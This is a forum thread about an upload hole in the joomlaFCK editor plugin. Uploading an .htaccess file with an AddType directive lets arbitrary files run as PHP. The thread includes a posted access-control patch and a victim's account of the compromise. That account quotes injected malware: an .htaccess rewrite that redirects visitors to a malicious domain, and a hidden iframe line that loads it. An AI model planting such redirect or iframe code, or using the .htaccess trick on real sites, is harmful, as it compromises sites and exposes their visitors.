Backdoor in joomlaFCK

[pzotov]

Any user can upload files to your site.

joomlaFCK <= 1.1.5
http://www.site.com/mambots/editors/fck ... nector.php

joomlaFCK 1.2.0
http://www.site.com/mambots/editors/fck ... nector.php

joomlaFCK disallows to upload .php-files, but it allows to upload .htaccess (with Type=File or Type=files). So AddType directive in .htaccess allows to run any file as php.

My solution:
File:
mambots/editors/fckeditor/editor/filemanager/browser/default/connectors/php/config.php

After line 27 add:

Code: Select all

// Added by Pavel V. Zotov 20060720
define( '_VALID_MOS', 1 );

$allowed_backend_groups = array(23,24,25);

require_once( $mosConfig_absolute_path."/globals.php" );
require_once( $mosConfig_absolute_path."/includes/joomla.php" );
session_name( md5( $mosConfig_live_site ) );
session_start();
$mainframe = new mosMainFrame( $database, '', $mosConfig_absolute_path, 1 );
$my = $mainframe->initSessionAdmin( null, null );
if( !in_array( $my->gid, $allowed_backend_groups ) ) die( 'Restricted access' );
// end of addition by Pavel V. Zotov

So, only SuperAdministrator, Administrator or Manager (logged in backend) can use filemanager in joomlaFCK

Also you should to dissalow .htaccess

[smart]

joomlaFCK disallows to upload .php-files, but it allows to upload .htaccess (with Type=File or Type=files). So AddType directive in .htaccess allows to run any file as php.

I'm wrote mail to Frederico Caldeira Knabben (FCKEditor author) and got answer about this problem:

«Thanks for the advice. I'll add the htaccess to the list of denied extensions. Actually the real solution would be to set the list of allowed extensions instead, but I would have a lot of complains regarding missing extensions there.»

[dparanhos]

I can confirm this backdoor as my website was hacked by it. It affects .htaccess and javascript files.
My website was based in Joomla 1.7.1 at jan/2013.

I will briefly describe what happened.

Few weeks after installing this JoomlaCK or JoomlaFCK plugin, when I tried to access my website it was instantly forwarded to a malicious website.

I found that my root .htacess file had this line added automatically without my permission:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/$ [NC]
RewriteRule ^.*$ http://gabriellerosephotography .com/emad.html?h=933119 [L,R]
</IfModule>

Also, many folders within administrator/modules had brand new .htaccess file created all containing the code above.

Another thing, all my custom javascritp files had the line added:
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography. com/emad.html?j=933119></iframe>');

I started checking the cronology of creation of these files, and I found out that the first .htacess created was inside the JCKeditor plugin folder, so I suspected that this was the starting point. Also, the only plugin folder affected was this plugin. Most of folders affected were modules.

Searching the web about the JoomlaCK plugin editor backdoor, I found the topic above, that confirms to me exactly how my website was hacked.

Unfortunatelly I had to disable the plugin, even though it seems very usefull. I dont know if this bug / backdoor is already fixed, I just would like to share here to prevent other websites being hacked as long as I suspect this was the cause of attack.

[brian]

Joomla 1.7.1 is out dated and insecure - just because you see the evidence of the hack in a cpecific extensions folder doesnt mean that it is the cause. If I was a naughty boy and had hacked your site and uploaded a backdoor there is no way I wold be as stupid as to leave the backdoor in a place that would let you identify the area of vulnerability. Instead i would hide it somewhere completely different and probably at the end of the deepest directory i could find on the site

[dparanhos]

Joomla 1.7.1 is out dated and insecure - just because you see the evidence of the hack in a cpecific extensions folder doesnt mean that it is the cause. If I was a naughty boy and had hacked your site and uploaded a backdoor there is no way I wold be as stupid as to leave the backdoor in a place that would let you identify the area of vulnerability. Instead i would hide it somewhere completely different and probably at the end of the deepest directory i could find on the site

Mr BRIAN,

You are right, probably the cause of attack is not the extension itself, my conclusion was based only in the timeframe of contamination. Later I found many other up folders with contaminated XSS files as you suggested, including PHPs, javascripts and HTMLs.

I updated joomla to a fresh 2.5.9, after making a research about joomla 1.7.1 core XSS vulnerabilities.